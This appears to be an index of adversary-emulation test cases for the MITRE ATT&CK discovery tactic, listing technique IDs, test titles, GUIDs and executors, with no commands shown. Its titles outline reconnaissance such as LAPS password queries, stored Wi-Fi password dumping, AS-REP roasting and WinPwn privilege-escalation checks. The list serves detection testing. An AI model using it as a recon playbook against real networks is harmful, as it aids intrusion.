1867 discovery T1087.002 Account Discovery: Domain Account 4 Automated AD Recon (ADRecon) 95018438-454a-468c-a0fa-59c800149b59 powershell
1868 discovery T1087.002 Account Discovery: Domain Account 5 Adfind -Listing password policy 736b4f53-f400-4c22-855d-1a6b5a551600 command_prompt
1869 discovery T1087.002 Account Discovery: Domain Account 6 Adfind - Enumerate Active Directory Admins b95fd967-4e62-4109-b48d-265edfd28c3a command_prompt
1870 discovery T1087.002 Account Discovery: Domain Account 7 Adfind - Enumerate Active Directory User Objects e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 command_prompt
1871 discovery T1087.002 Account Discovery: Domain Account 8 Adfind - Enumerate Active Directory Exchange AD Objects 5e2938fb-f919-47b6-8b29-2f6a1f718e99 command_prompt
1872 discovery T1087.002 Account Discovery: Domain Account 9 Enumerate Default Domain Admin Details (Domain) c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef command_prompt
1873 discovery T1087.002 Account Discovery: Domain Account 10 Enumerate Active Directory for Unconstrained Delegation 46f8dbe9-22a5-4770-8513-66119c5be63b powershell
1874 discovery T1087.002 Account Discovery: Domain Account 11 Get-DomainUser with PowerView 93662494-5ed7-4454-a04c-8c8372808ac2 powershell
1875 discovery T1087.002 Account Discovery: Domain Account 12 Enumerate Active Directory Users with ADSISearcher 02e8be5a-3065-4e54-8cc8-a14d138834d3 powershell
1876 discovery T1087.002 Account Discovery: Domain Account 13 Enumerate Linked Policies In ADSISearcher Discovery 7ab0205a-34e4-4a44-9b04-e1541d1a57be powershell
1877 discovery T1087.002 Account Discovery: Domain Account 14 Enumerate Root Domain linked policies Discovery 00c652e2-0750-4ca6-82ff-0204684a6fe4 powershell
1878 discovery T1087.002 Account Discovery: Domain Account 15 WinPwn - generaldomaininfo ce483c35-c74b-45a7-a670-631d1e69db3d powershell
1879 discovery T1087.002 Account Discovery: Domain Account 16 Kerbrute - userenum f450461c-18d1-4452-9f0d-2c42c3f08624 powershell
1880 discovery T1087.002 Account Discovery: Domain Account 17 Wevtutil - Discover NTLM Users Remote b8a563d4-a836-4993-a74e-0a19b8481bfe powershell
1881 discovery T1087.002 Account Discovery: Domain Account 18 Suspicious LAPS Attributes Query with Get-ADComputer all properties 394012d9-2164-4d4f-b9e5-acf30ba933fe powershell
1882 discovery T1087.002 Account Discovery: Domain Account 19 Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property 6e85bdf9-7bc4-4259-ac0f-f0cb39964443 powershell
1883 discovery T1087.002 Account Discovery: Domain Account 20 Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope ffbcfd62-15d6-4989-a21a-80bfc8e58bb5 powershell
1884 discovery T1087.002 Account Discovery: Domain Account 21 Suspicious LAPS Attributes Query with adfind all properties abf00f6c-9983-4d9a-afbc-6b1c6c6448e1 powershell
1885 discovery T1087.002 Account Discovery: Domain Account 22 Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd 51a98f96-0269-4e09-a10f-e307779a8b05 powershell
1886 discovery T1087.002 Account Discovery: Domain Account 23 Active Directory Domain Search 096b6d2a-b63f-4100-8fa0-525da4cd25ca sh
1887 discovery T1087.002 Account Discovery: Domain Account 24 Account Enumeration with LDAPDomainDump a54d497e-8dbe-4558-9895-44944baa395f sh
1888 discovery T1087.001 Account Discovery: Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
1889 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
1890 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
1891 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
1892 discovery T1087.001 Account Discovery: Local Account 5 Show if a user account has ever logged in remotely 0f0b6a29-08c3-44ad-a30b-47fd996b2110 sh
1893 discovery T1087.001 Account Discovery: Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
1894 discovery T1087.001 Account Discovery: Local Account 7 Enumerate users and groups 319e9f6c-7a9e-432e-8c62-9385c803b6f2 sh
1895 discovery T1087.001 Account Discovery: Local Account 8 Enumerate all accounts on Windows (Local) 80887bec-5a9b-4efc-a81d-f83eb2eb32ab command_prompt
1896 discovery T1087.001 Account Discovery: Local Account 9 Enumerate all accounts via PowerShell (Local) ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b powershell
1897 discovery T1087.001 Account Discovery: Local Account 10 Enumerate logged on users via CMD (Local) a138085e-bfe5-46ba-a242-74a6fb884af3 command_prompt
1898 discovery T1087.001 Account Discovery: Local Account 11 ESXi - Local Account Discovery via ESXCLI 9762ac6e-aa60-4449-a2f0-cbbd0e1fd22c command_prompt
1899 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
1900 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (FreeBSD) e129d73b-3e03-4ae9-bf1e-67fc8921e0fd sh
1901 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
1902 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via ioreg a960185f-aef6-4547-8350-d1ce16680d09 sh
1903 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 5 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
1904 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 6 Detect Virtualization Environment using sysctl (hw.model) 6beae646-eb4c-4730-95be-691a4094408c sh
1905 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 7 Check if System Integrity Protection is enabled 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945 sh
1906 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 8 Detect Virtualization Environment using system_profiler e04d2e89-de15-4d90-92f9-a335c7337f0f sh
1907 discovery T1069.002 Permission Groups Discovery: Domain Groups 1 Basic Permission Groups Discovery Windows (Domain) dd66d77d-8998-48c0-8024-df263dc2ce5d command_prompt
1908 discovery T1069.002 Permission Groups Discovery: Domain Groups 2 Permission Groups Discovery PowerShell (Domain) 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 powershell
1909 discovery T1069.002 Permission Groups Discovery: Domain Groups 3 Elevated group enumeration using net group (Domain) 0afb5163-8181-432e-9405-4322710c0c37 command_prompt
1910 discovery T1069.002 Permission Groups Discovery: Domain Groups 4 Find machines where user has local admin access (PowerView) a2d71eee-a353-4232-9f86-54f4288dd8c1 powershell
1911 discovery T1069.002 Permission Groups Discovery: Domain Groups 5 Find local admins on all machines in domain (PowerView) a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd powershell
1912 discovery T1069.002 Permission Groups Discovery: Domain Groups 6 Find Local Admins via Group Policy (PowerView) 64fdb43b-5259-467a-b000-1b02c00e510a powershell
1913 discovery T1069.002 Permission Groups Discovery: Domain Groups 7 Enumerate Users Not Requiring Pre Auth (ASRepRoast) 870ba71e-6858-4f6d-895c-bb6237f6121b powershell
1914 discovery T1069.002 Permission Groups Discovery: Domain Groups 8 Adfind - Query Active Directory Groups 48ddc687-82af-40b7-8472-ff1e742e8274 command_prompt
1915 discovery T1069.002 Permission Groups Discovery: Domain Groups 9 Enumerate Active Directory Groups with Get-AdGroup 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8 powershell
1916 discovery T1069.002 Permission Groups Discovery: Domain Groups 10 Enumerate Active Directory Groups with ADSISearcher 9f4e344b-8434-41b3-85b1-d38f29d148d0 powershell
1917 discovery T1069.002 Permission Groups Discovery: Domain Groups 11 Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 powershell
1918 discovery T1069.002 Permission Groups Discovery: Domain Groups 12 Get-DomainGroupMember with PowerView 46352f40-f283-4fe5-b56d-d9a71750e145 powershell
1919 discovery T1069.002 Permission Groups Discovery: Domain Groups 13 Get-DomainGroup with PowerView 5a8a181c-2c8e-478d-a943-549305a01230 powershell
1920 discovery T1069.002 Permission Groups Discovery: Domain Groups 14 Active Directory Enumeration with LDIFDE 22cf8cb9-adb1-4e8c-80ca-7c723dfc8784 command_prompt
1921 discovery T1069.002 Permission Groups Discovery: Domain Groups 15 Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS d58d749c-4450-4975-a9e9-8b1d562755c2 sh
1922 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
1923 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
1924 discovery T1007 System Service Discovery 3 System Service Discovery - systemctl/service f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
1925 discovery T1007 System Service Discovery 4 Get-Service Execution 51f17016-d8fa-4360-888a-df4bf92c4a04 command_prompt
1926 discovery T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
1927 discovery T1040 Network Sniffing 2 Packet Capture FreeBSD using tshark or tcpdump c93f2492-9ebe-44b5-8b45-36574cccfe67 sh
1928 discovery T1040 Network Sniffing 3 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
1929 discovery T1040 Network Sniffing 4 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
1930 discovery T1040 Network Sniffing 5 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
1931 discovery T1040 Network Sniffing 6 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
1932 discovery T1040 Network Sniffing 7 Windows Internal pktmon set filter 855fb8b4-b8ab-4785-ae77-09f5df7bff55 command_prompt
1933 discovery T1040 Network Sniffing 8 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
1934 discovery T1040 Network Sniffing 9 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
1935 discovery T1040 Network Sniffing 10 Packet Capture FreeBSD using /dev/bpfN with sudo e2028771-1bfb-48f5-b5e6-e50ee0942a14 sh
1936 discovery T1040 Network Sniffing 11 Filtered Packet Capture FreeBSD using /dev/bpfN with sudo a3a0d4c9-c068-4563-a08d-583bd05b884c sh
1937 discovery T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
1938 discovery T1040 Network Sniffing 13 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
1939 discovery T1040 Network Sniffing 14 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
1940 discovery T1040 Network Sniffing 15 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
1941 discovery T1040 Network Sniffing 16 PowerShell Network Sniffing 9c15a7de-de14-46c3-bc2a-6d94130986ae powershell
1942 discovery T1135 Network Share Discovery 1 Network Share Discovery f94b5ad9-911c-4eff-9718-fd21899db4f7 sh
1943 discovery T1135 Network Share Discovery 2 Network Share Discovery - linux 875805bc-9e86-4e87-be86-3a5527315cae bash
1944 discovery T1135 Network Share Discovery 3 Network Share Discovery - FreeBSD 77e468a6-3e5c-45a1-9948-c4b5603747cb sh
1945 discovery T1135 Network Share Discovery 4 Network Share Discovery command prompt 20f1097d-81c1-405c-8380-32174d493bbb command_prompt
1946 discovery T1135 Network Share Discovery 5 Network Share Discovery PowerShell 1b0814d1-bb24-402d-9615-1b20c50733fb powershell
1947 discovery T1135 Network Share Discovery 6 View available share drives ab39a04f-0c93-4540-9ff2-83f862c385ae command_prompt
1948 discovery T1135 Network Share Discovery 7 Share Discovery with PowerView b1636f0a-ba82-435c-b699-0d78794d8bfd powershell
1949 discovery T1135 Network Share Discovery 8 PowerView ShareFinder d07e4cc1-98ae-447e-9d31-36cb430d28c4 powershell
1950 discovery T1135 Network Share Discovery 9 WinPwn - shareenumeration 987901d1-5b87-4558-a6d9-cffcabc638b8 powershell
1951 discovery T1135 Network Share Discovery 10 Network Share Discovery via dir command 13daa2cf-195a-43df-a8bd-7dd5ffb607b5 command_prompt
1952 discovery T1135 Network Share Discovery 11 Enumerate All Network Shares with SharpShares d1fa2a69-b0a2-4e8a-9112-529b00c19a41 powershell
1953 discovery T1135 Network Share Discovery 12 Enumerate All Network Shares with Snaffler b19d74b7-5e72-450a-8499-82e49e379d1a powershell
1954 discovery T1120 Peripheral Device Discovery 1 Win32_PnPEntity Hardware Inventory 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 powershell
1955 discovery T1120 Peripheral Device Discovery 2 WinPwn - printercheck cb6e76ca-861e-4a7f-be08-564caa3e6f75 powershell
1956 discovery T1120 Peripheral Device Discovery 3 Peripheral Device Discovery via fsutil 424e18fd-48b8-4201-8d3a-bf591523a686 command_prompt
1957 discovery T1120 Peripheral Device Discovery 4 Get Printer Device List via PowerShell Command 5c876daf-db1e-41cf-988d-139a7443ccd4 powershell
1958 discovery T1082 System Information Discovery 1 System Information Discovery 66703791-c902-4560-8770-42b8a91f7667 command_prompt
1959 discovery T1082 System Information Discovery 2 System Information Discovery edff98ec-0f73-4f63-9890-6b117092aff6 sh
1960 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
1961 discovery T1082 System Information Discovery 4 Linux VM Check via Hardware 31dad7ad-2286-4c02-ae92-274418c85fec bash
1962 discovery T1082 System Information Discovery 5 Linux VM Check via Kernel Modules 8057d484-0fae-49a4-8302-4812c4f1e64e bash
1963 discovery T1082 System Information Discovery 6 FreeBSD VM Check via Kernel Modules eefe6a49-d88b-41d8-8fc2-b46822da90d3 sh
1964 discovery T1082 System Information Discovery 7 Hostname Discovery (Windows) 85cfbf23-4a1e-4342-8792-007e004b975f command_prompt
1965 discovery T1082 System Information Discovery 8 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 sh
1966 discovery T1082 System Information Discovery 9 Windows MachineGUID Discovery 224b4daf-db44-404e-b6b2-f4d1f0126ef8 command_prompt
1967 discovery T1082 System Information Discovery 10 Griffon Recon 69bd4abe-8759-49a6-8d21-0f15822d6370 powershell
1968 discovery T1082 System Information Discovery 11 Environment variables discovery on windows f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 command_prompt
1969 discovery T1082 System Information Discovery 12 Environment variables discovery on freebsd, macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
1970 discovery T1082 System Information Discovery 13 Show System Integrity Protection status (MacOS) 327cc050-9e99-4c8e-99b5-1d15f2fb6b96 sh
1971 discovery T1082 System Information Discovery 14 WinPwn - winPEAS eea1d918-825e-47dd-acc2-814d6c58c0e1 powershell
1972 discovery T1082 System Information Discovery 15 WinPwn - itm4nprivesc 3d256a2f-5e57-4003-8eb6-64d91b1da7ce powershell
1973 discovery T1082 System Information Discovery 16 WinPwn - Powersploits privesc checks 345cb8e4-d2de-4011-a580-619cf5a9e2d7 powershell
1974 discovery T1082 System Information Discovery 17 WinPwn - General privesc checks 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed powershell
1975 discovery T1082 System Information Discovery 18 WinPwn - GeneralRecon 7804659b-fdbf-4cf6-b06a-c03e758590e8 powershell
1976 discovery T1082 System Information Discovery 19 WinPwn - Morerecon 3278b2f6-f733-4875-9ef4-bfed34244f0a powershell
1977 discovery T1082 System Information Discovery 20 WinPwn - RBCD-Check dec6a0d8-bcaf-4c22-9d48-2aee59fb692b powershell
1978 discovery T1082 System Information Discovery 21 WinPwn - PowerSharpPack - Watson searching for missing windows patches 07b18a66-6304-47d2-bad0-ef421eb2e107 powershell
1979 discovery T1082 System Information Discovery 22 WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors efb79454-1101-4224-a4d0-30c9c8b29ffc powershell
1980 discovery T1082 System Information Discovery 23 WinPwn - PowerSharpPack - Seatbelt 5c16ceb4-ba3a-43d7-b848-a13c1f216d95 powershell
1981 discovery T1082 System Information Discovery 24 Azure Security Scan with SkyArk 26a18d3d-f8bc-486b-9a33-d6df5d78a594 powershell
1982 discovery T1082 System Information Discovery 25 Linux List Kernel Modules 034fe21c-3186-49dd-8d5d-128b35f181c7 sh
1983 discovery T1082 System Information Discovery 26 FreeBSD List Kernel Modules 4947897f-643a-4b75-b3f5-bed6885749f6 sh
1984 discovery T1082 System Information Discovery 27 System Information Discovery with WMIC 8851b73a-3624-4bf7-8704-aa312411565c command_prompt
1985 discovery T1082 System Information Discovery 28 System Information Discovery 4060ee98-01ae-4c8e-8aad-af8300519cc7 command_prompt
1986 discovery T1082 System Information Discovery 29 Check computer location 96be6002-9200-47db-94cb-c3e27de1cb36 command_prompt
1987 discovery T1082 System Information Discovery 30 BIOS Information Discovery through Registry f2f91612-d904-49d7-87c2-6c165d23bead command_prompt
1988 discovery T1082 System Information Discovery 31 ESXi - VM Discovery using ESXCLI 2040405c-eea6-4c1c-aef3-c2acc430fac9 command_prompt
1989 discovery T1082 System Information Discovery 32 ESXi - Darkside system information discovery f89812e5-67d1-4f49-86fa-cbc6609ea86a command_prompt
1990 discovery T1082 System Information Discovery 33 sysctl to gather macOS hardware info c8d40da9-31bd-47da-a497-11ea55d1ef6c sh
1991 discovery T1082 System Information Discovery 34 operating system discovery 70e13ef4-5a74-47e4-9d16-760b41b0e2db powershell
1992 discovery T1082 System Information Discovery 35 Check OS version via "ver" command f6ecb109-df24-4303-8d85-1987dbae6160 command_prompt
1993 discovery T1082 System Information Discovery 36 Display volume shadow copies with "vssadmin" 7161b085-816a-491f-bab4-d68e974b7995 command_prompt
1994 discovery T1082 System Information Discovery 37 Identify System Locale and Regional Settings with PowerShell ce479c1a-e8fa-42b2-812a-96b0f2f4d28a command_prompt
1995 discovery T1082 System Information Discovery 38 Enumerate Available Drives via gdr c187c9bc-4511-40b3-aa10-487b2c70b6a5 command_prompt
1996 discovery T1082 System Information Discovery 39 Discover OS Product Name via Registry be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7 command_prompt
1997 discovery T1082 System Information Discovery 40 Discover OS Build Number via Registry acfcd709-0013-4f1e-b9ee-bc1e7bafaaec command_prompt
1998 discovery T1016.002 System Network Configuration Discovery: Wi-Fi Discovery 1 Enumerate Stored Wi-Fi Profiles And Passwords via netsh 53cf1903-0fa7-4177-ab14-f358ae809eec command_prompt
1999 discovery T1010 Application Window Discovery 1 List Process Main Windows - C# .NET fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 command_prompt
2000 discovery T1497.003 Time Based Evasion 1 Delay execution with ping 8b87dd03-8204-478c-bac3-3959f6528de3 sh
2001 discovery T1580 Cloud Infrastructure Discovery 1 AWS - EC2 Enumeration from Cloud Instance 99ee161b-dcb1-4276-8ecb-7cfdcb207820 sh
2002 discovery T1580 Cloud Infrastructure Discovery 2 AWS - EC2 Security Group Enumeration 99b38f24-5acc-4aa3-85e5-b7f97a5d37ac command_prompt
2003 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
2004 discovery T1217 Browser Bookmark Discovery 2 List Mozilla Firefox Bookmark Database Files on macOS 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b sh
2005 discovery T1217 Browser Bookmark Discovery 3 List Google Chrome Bookmark JSON Files on macOS b789d341-154b-4a42-a071-9111588be9bc sh
2006 discovery T1217 Browser Bookmark Discovery 4 List Google Chromium Bookmark JSON Files on FreeBSD 88ca025b-3040-44eb-9168-bd8af22b82fa sh
2007 discovery T1217 Browser Bookmark Discovery 5 List Google Chrome / Opera Bookmarks on Windows with powershell faab755e-4299-48ec-8202-fc7885eb6545 powershell
2008 discovery T1217 Browser Bookmark Discovery 6 List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt 76f71e2f-480e-4bed-b61e-398fe17499d5 command_prompt
2009 discovery T1217 Browser Bookmark Discovery 7 List Mozilla Firefox bookmarks on Windows with command prompt 4312cdbc-79fc-4a9c-becc-53d49c734bc5 command_prompt
2010 discovery T1217 Browser Bookmark Discovery 8 List Internet Explorer Bookmarks using the command prompt 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 command_prompt
2011 discovery T1217 Browser Bookmark Discovery 9 List Safari Bookmarks on MacOS 5fc528dd-79de-47f5-8188-25572b7fafe0 sh
2012 discovery T1217 Browser Bookmark Discovery 10 Extract Edge Browsing History 74094120-e1f5-47c9-b162-a418a0f624d5 powershell
2013 discovery T1217 Browser Bookmark Discovery 11 Extract chrome Browsing History cfe6315c-4945-40f7-b5a4-48f7af2262af powershell
2014 discovery T1016 System Network Configuration Discovery 1 System Network Configuration Discovery on Windows 970ab6a1-0157-4f3f-9a73-ec4166754b23 command_prompt
2015 discovery T1016 System Network Configuration Discovery 2 List Windows Firewall Rules 038263cb-00f4-4b0a-98ae-0696c67e1752 command_prompt
2016 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
2017 discovery T1016 System Network Configuration Discovery 4 System Network Configuration Discovery (TrickBot Style) dafaf052-5508-402d-bf77-51e0700c02e2 command_prompt
2018 discovery T1016 System Network Configuration Discovery 5 List Open Egress Ports 4b467538-f102-491d-ace7-ed487b853bf5 powershell
2019 discovery T1016 System Network Configuration Discovery 6 Adfind - Enumerate Active Directory Subnet Objects 9bb45dd7-c466-4f93-83a1-be30e56033ee command_prompt
2020 discovery T1016 System Network Configuration Discovery 7 Qakbot Recon 121de5c6-5818-4868-b8a7-8fd07c455c1b command_prompt
2021 discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
2022 discovery T1016 System Network Configuration Discovery 9 DNS Server Discovery Using nslookup 34557863-344a-468f-808b-a1bfb89b4fa9 command_prompt
2023 discovery T1482 Domain Trust Discovery 1 Windows - Discover domain trusts with dsquery 4700a710-c821-4e17-a3ec-9e4c81d6845f command_prompt
2024 discovery T1482 Domain Trust Discovery 2 Windows - Discover domain trusts with nltest 2e22641d-0498-48d2-b9ff-c71e496ccdbe command_prompt
2025 discovery T1482 Domain Trust Discovery 3 Powershell enumerate domains and forests c58fbc62-8a62-489e-8f2d-3565d7d96f30 powershell
2026 discovery T1482 Domain Trust Discovery 4 Adfind - Enumerate Active Directory OUs d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec command_prompt
2027 discovery T1482 Domain Trust Discovery 5 Adfind - Enumerate Active Directory Trusts 15fe436d-e771-4ff3-b655-2dca9ba52834 command_prompt
2028 discovery T1482 Domain Trust Discovery 6 Get-DomainTrust with PowerView f974894c-5991-4b19-aaf5-7cc2fe298c5d powershell
2029 discovery T1482 Domain Trust Discovery 7 Get-ForestTrust with PowerView 58ed10e8-0738-4651-8408-3a3e9a526279 powershell
2030 discovery T1482 Domain Trust Discovery 8 TruffleSnout - Listing AD Infrastructure ea1b4f2d-5b82-4006-b64f-f2845608a3bf command_prompt
2031 discovery T1083 File and Directory Discovery 1 File and Directory Discovery (cmd.exe) 0e36303b-6762-4500-b003-127743b80ba6 command_prompt
2032 discovery T1083 File and Directory Discovery 2 File and Directory Discovery (PowerShell) 2158908e-b7ef-4c21-8a83-3ce4dd05a924 powershell
2033 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
2034 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
2035 discovery T1083 File and Directory Discovery 5 Simulating MAZE Directory Enumeration c6c34f61-1c3e-40fb-8a58-d017d88286d8 powershell
2036 discovery T1083 File and Directory Discovery 6 Launch DirLister Executable c5bec457-43c9-4a18-9a24-fe151d8971b7 powershell
2037 discovery T1083 File and Directory Discovery 7 ESXi - Enumerate VMDKs available on an ESXi Host 4a233a40-caf7-4cf1-890a-c6331bbc72cf command_prompt
2038 discovery T1083 File and Directory Discovery 8 Identifying Network Shares - Linux 361fe49d-0c19-46ec-a483-ccb92d38e88e sh
2039 discovery T1083 File and Directory Discovery 9 Recursive Enumerate Files And Directories By Powershell 95a21323-770d-434c-80cd-6f6fbf7af432 powershell
2040 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
2041 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
2042 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery FreeBSD, Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
2043 discovery T1049 System Network Connections Discovery 4 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
2044 discovery T1619 Cloud Storage Object Discovery 1 AWS S3 Enumeration 3c7094f8-71ec-4917-aeb8-a633d7ec4ef5 sh
2045 discovery T1619 Cloud Storage Object Discovery 2 Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI 070322a4-2c60-4c50-8ffb-c450a34fe7bf powershell
2046 discovery T1619 Cloud Storage Object Discovery 3 Azure - Scan for Anonymous Access to Azure Storage (Powershell) 146af1f1-b74e-4aa7-9895-505eb559b4b0 powershell
2047 discovery T1619 Cloud Storage Object Discovery 4 Azure - Enumerate Azure Blobs with MicroBurst 3dab4bcc-667f-4459-aea7-4162dd2d6590 powershell
2048 discovery T1654 Log Enumeration 1 Get-EventLog To Enumerate Windows Security Log a9030b20-dd4b-4405-875e-3462c6078fdc powershell
2049 discovery T1654 Log Enumeration 2 Enumerate Windows Security Log via WevtUtil fef0ace1-3550-4bf1-a075-9fea55a778dd command_prompt
2050 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
2051 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
2052 discovery T1057 Process Discovery 3 Process Discovery - Get-Process 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 powershell
2053 discovery T1057 Process Discovery 4 Process Discovery - get-wmiObject b51239b4-0129-474f-a2b4-70f855b9f2c2 powershell
2054 discovery T1057 Process Discovery 5 Process Discovery - wmic process 640cbf6d-659b-498b-ba53-f6dd1a1cc02c command_prompt
2055 discovery T1057 Process Discovery 6 Discover Specific Process - tasklist 11ba69ee-902e-4a0f-b3b6-418aed7d7ddb command_prompt
2056 discovery T1057 Process Discovery 7 Process Discovery - Process Hacker 966f4c16-1925-4d9b-8ce0-01334ee0867d powershell
2057 discovery T1057 Process Discovery 8 Process Discovery - PC Hunter b4ca838d-d013-4461-bf2c-f7132617b409 powershell
2058 discovery T1057 Process Discovery 9 Launch Taskmgr from cmd to View running processes 4fd35378-39aa-481e-b7c4-e3bf49375c67 command_prompt
2059 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
2060 discovery T1069.001 Permission Groups Discovery: Local Groups 2 Basic Permission Groups Discovery Windows (Local) 1f454dd6-e134-44df-bebb-67de70fb6cd8 command_prompt
2061 discovery T1069.001 Permission Groups Discovery: Local Groups 3 Permission Groups Discovery PowerShell (Local) a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 powershell
2062 discovery T1069.001 Permission Groups Discovery: Local Groups 4 SharpHound3 - LocalAdmin e03ada14-0980-4107-aff1-7783b2b59bb1 powershell
2063 discovery T1069.001 Permission Groups Discovery: Local Groups 5 Wmic Group Discovery 7413be50-be8e-430f-ad4d-07bf197884b2 command_prompt
2064 discovery T1069.001 Permission Groups Discovery: Local Groups 6 WMIObject Group Discovery 69119e58-96db-4110-ad27-954e48f3bb13 powershell
2065 discovery T1069.001 Permission Groups Discovery: Local Groups 7 Permission Groups Discovery for Containers- Local Groups 007d7aa4-8c4d-4f55-ba6a-7c965d51219c sh
2066 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
2067 discovery T1201 Password Policy Discovery 2 Examine password complexity policy - FreeBSD a7893624-a3d7-4aed-9676-80498f31820f sh
2068 discovery T1201 Password Policy Discovery 3 Examine password complexity policy - CentOS/RHEL 7.x 78a12e65-efff-4617-bc01-88f17d71315d bash
2069 discovery T1201 Password Policy Discovery 4 Examine password complexity policy - CentOS/RHEL 6.x 6ce12552-0adb-4f56-89ff-95ce268f6358 bash
2070 discovery T1201 Password Policy Discovery 5 Examine password expiration policy - All Linux 7c86c55c-70fa-4a05-83c9-3aa19b145d1a bash
2071 discovery T1201 Password Policy Discovery 6 Examine local password policy - Windows 4588d243-f24e-4549-b2e3-e627acc089f6 command_prompt
2072 discovery T1201 Password Policy Discovery 7 Examine domain password policy - Windows 46c2c362-2679-4ef5-aec9-0e958e135be4 command_prompt
2073 discovery T1201 Password Policy Discovery 8 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
